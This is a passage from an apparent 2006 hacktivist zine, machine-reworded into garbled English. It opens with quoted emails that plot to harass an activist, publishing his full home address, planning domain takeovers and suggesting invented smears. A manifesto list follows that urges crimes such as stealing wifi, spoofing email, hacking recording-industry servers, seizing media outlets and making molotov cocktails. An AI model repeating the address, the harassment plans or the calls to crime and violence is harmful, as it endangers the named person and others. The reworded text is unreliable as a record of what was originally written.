protected]> To: [email protected] Sept 6: FBI right here TODAY. 3:00 P.M. chi2600 narc, in the event you wanna come, gimme a hoop at XXX-XXX-XXXX ext XXX I will get you instructions right here. From: narc <[email protected]> To: [email protected] Sept 14 Topic: Re: Guess who went to jail once more... I simply despatched a really misspelled observe in damaged english/french to Jeremy to search out out the place the Hackbloc shindig is, hopefully he'll reply and I will ship the data to Chicago Police Intelligence to have a little bit 'particular' enjoyable. I must pad the Indymedia feedback later tonight. - narc From: narc <[email protected]> To: [email protected] Aug 23 Topic: Re: Area fyi If its within the slush fund, purchase the remaining domains, however I would actually decide up the FreeJeremy.web .org .data and lock them out, and level them to fuckjeremy.com and perhaps seize the .web and .org If Jeremy does not replace the whois info, the registar will pull the area and because it stands there may be 247 hyperlinks again on MSN and 42 on Yahoo. Kinda laborious to get your message out in case your area is gone, and all of your different marketable domains are owned by nameless events. Properly, Saturday morning, after bailing from the post-meet breakfast at IHOP, I did a fast drive-by of Casa-de-Anarchy.... A few block and a half east of 90/94 on the North facet of thestreet. As within the image on his website, there is a pair of satellite tv for pc dishes hangning off the porch construction. Possibly on my approach to GenCon, I will get some reconnaissance photographs. Jeremy Hammond / 1908 South Canalport / Chicago, IL 60608 I am positive we are able to consider one thing acceptable to do with this information. > * Give Safety Workplace of Union Station subject of Chicago Reader I used to be planning on doing that this week, the Amtrak police are just about the defacto safety there, one thing to the impact that the Chicago 2600 was planning to fulfill there, however there may be one dangerous apple hell bent on creating strife, right here is the Chicago Reader article, any further questions I am unable to reply, you can strive the Chicago workplace of the FBI. > * Contact "ThePlanet.com" Re: Whois info for FreeJermey.com I have already got a mail out to them, I might be mailing ICANN tonight to "pace" issues up a little bit. From: narc <narc> To: [email protected] Aug 22 Topic: Re: :: A name for arms :: Look, Narc makes a variety of legitimate factors, however we're not speaking about details right here, have been speaking concerning the media. That is about picture, presentability, salesmanship...not actuality. You want somebody to promote them a greater story, and a reality based mostly letter to the editor is not going to do something. We'd like a narrative, a fable, one thing thrilling, that does not make us appear like the dangerous man. Which is going to be exceedingly tough, as a result of he is already had the story written about him. I might even contemplate making him an confederate or confidant of Konopka. Could not be true, however we're attempting to promote data right here, not run a sweet retailer. [------------------------------------------------------------------------------] [ dismantling the copyright industry ................ disrespectcopyrights.net ] [------------------------------------------------------------------------------] "Amount and high quality of P2P applied sciences are inversely proportional to the numbers of lawsuits issued to cease P2P" - third Monty's Legislation We're proposing DisrespectCopyrights.web, a portal to info piracy. We function a assume tank to oppose and subvert the copyright business, whereas encouraging impartial media and file sharing alternate options to industrial web. * file archives - a set of impartial do-it-yourself supplies together with activism, anarchism, anti-copyright, code, hts, pictures, authorized, mp3, propaganda, and zines. additionally permits folks to add their very own information. * information feeds - from varied sources together with the eff, p2pnet, slyck, respectp2p, and many others. * wiki - all pages modifiable We're additionally in search of flash designers to parody the content material obtainable on the official MPAA website RespectCopyrights.org, twisting their language and imagery to encourage piracy. BECOME A TRAFFICKER OF ILLEGAL INFORMATION or: HOW I LEARNED TO STOP WORRYING AND LOVE DISMANTLING THE COPYRIGHT INDUSTRY * help file sharing companies by establishing torrent trackers and seeding, information, beginning ftp/irc drops, and working tor servers on excessive bandwidth connections * begin a radical video assortment and burn copies to vcds and dvds handy out without spending a dime at reveals, faculties, or with different radical literature * make your individual media and launch it without spending a dime utilizing a Inventive Commons license * bastardize company imagery, print out stickers and huge posters to cowl the town * embrace open publishing methods resembling indymedia, wiki, and many others * help the ACLU, the EFF, and different civil liberties / digital rights teams. Think about organizing a pirate parade with costumes flags and devices whereas at the identical time holding an anti-copyright protest with a bunch of hackers handing out free software program. This avenue motion is considered one of many potential situations for upcoming conventions like HOPE. The probabilities are countless. !!!!!!!!!!!!!!!!!!!!!!!! !!! HACK THIS ZINE !!! !!! SPRING 2006 !!! !!!!!!!!!!!!!!!!!!!!!!!! We're an impartial collective of artistic hackers, crackers, artists and anarchists. We collect to debate and educate one another via vulnerability analysis and code auditing, sensible anarchy and organizing for nationwide conventions and protests. Be a part of us to discover optimistic hacktivism to assist defend a free web and a free society. THE INTERNET IS THE STAGE WE ARE THE ACTORS Jeremy Hammond whooka at gmail.com ZINE STAFF DarkAngel, OutThere, Kuroishi, br0kenkeychain, reality, nomenumbra, C HACK THIS SITE IceShaman, html, buz, Custodis, OutThere, archaios, Mcaster, ScriptBlue, TechnoGuyRob, scenestar HACKTIVIST / HACKBLOC flatline, alxclada, DarkAngel, Ardeo, Kuroishi, Thetan, wyrmkill, Reality, EvilDeshi, ScriptBlue OTHER HELPERS bfamredux, Phate, LeaChim, skopii, s1d, tgo, Hawk, ikari, Random Cola, genome, EvilDeshi/WickedRadio, darwin, DarKry, C, Weiznit THIS GOES OUT TO those that are courageous sufficient to confront and combat racists, homphobes, non secular fundamentalists, right-wing extremists and different fascists on the street, these who do emergency fundraising, media work, and drive lots of of miles to bail us out of jail, my companion in crime fetus who via our love commited numerous superbly loopy actions I dare not converse of, the cool folks at chicago2600 who do not put up with the bullshit from the white hats feds and narcs, the militant anti-capitalists at midwest unrest and prole.data, the magical folks who go to the rainbow gatherings, moon festivals, burning man and different gatherings of free minded folks, those that are courageous and keen to danger every thing to take direct motion in protection of mom earth and it is creatures. the loopy hackers at anomalous safety, pulltheplug, the #phrack efnet crew, digital souls, el8 / h0no, rant media, x10, dikline, we're all brothers and sisters working collectively to dismantle the white hat safety business who would given the possibility would promote us all out. GET INVOLVED ON THE WWW hackthissite.org * hacktivist.web * hackbloc.org rootthisbox.org * disrespectcopyrights.web * wickedradio.org indymedia.org * infoshop.org * crimethinc.com/web/org MAKE CONTACT irc.hackthissite.org SSL port 7000 #hackthissite #hacktivist.web #assist go to our on-line boards at criticalsecurity.web e mail us at [email protected] !!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!! HAPPENINGS !!! !!! GET YOUR HACKBLOC ON !!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!! NATIONAL CONFERENCE ON ORGANIZED RESISTANCE(NCOR) STATE OF THE UNION PROTESTS / WASHINGTON DC, FEB 3-5 BAY AREA ANARCHIST BOOKFAIR MARCH 19 ANTIWAR PROTESTS SAN FRANCISCO / BERKELEY LATE MARCH BIODEMOCRACY ACTIONS / CHICAGO APRIL 9-12 HACKERS ON PLANET EARTH / 2600 NEW YORK CITY, JULY 21-23 PIRATE PARADES, STREET PARTIES, ANTI-COPYRIGHT PROTESTS FREE SOFTWARE GIVAWAYS - HACKERS TAKE TO THE STREETS! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! construct a cantenna and steal wi-fi web entry * announce phony mayor resignations * give folks reductions on cellphone gasoline web or different utilities * begin a pirate radio station * give away free cellphone playing cards and get away with it * by no means speak to the police, refuse to present statements or testimony, and help political prisoners * op everybody in an irc channel * reprint, reword, and reuse copyrighted materials * go to high school or work carrying bathrobes, skirts, and pirate costumes * shut down main intersections within the enterprise district * make copies of radical movies and provides them away without spending a dime * spew confusion at normals * ship faux emails because the boss and announce raises for everyone * maintain avenue events to have fun the great prospects of life * begin a neighborhood "write on every thing day" * plant political propaganda in elementary faculties * seed torrent information * squat deserted buildings and maintain underground events * steal from the wealthy and provides to the poor * arm philosophers and the homeless * take over main media shops and broadcast subversive messages * develop file sharing companies and non-commercial web * maintain acid assessments and invite the neighbors * begin underground guerrilla public drum and dance brigades * confront racists, homophobes, right-wingers and different bigots on the road * produce your individual music, zines, and clothes * sniff company site visitors and create scandals * deface billboards with anti-capitalist messages * fill your head with heinous chemical compounds and speak to strangers on the prepare. do not inform them what your on * cross out maps to wealthy folks's addresses to the homeless * defeat self-checkout companies * syphon gasoline, dumpster some bottles, and study to make molotov cocktails * program a free open supply various to a industrial software program utility * convert your automotive to make use of bio-diesel * begin wildcat strikes and storm government workplaces * make stencils, giant posters + wheatpaste and hit the streets * social engineer some meals and provides it out to folks on the avenue * crash political social gathering conventions * refuse to get a bank card or different checking account * trip your bike within the quick lane * manage a faculty walkout * hook folks up with free cable * study to select locks and the best way to get away of handcuffs * destroy white hats, feds and narcs * by no means ask permission, and do not apologize * hack the recording business and use their servers to seed torrents to share industrial music, movies and software program * manage a pirate parade and give out copies of linux * begin a hacker class struggle !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!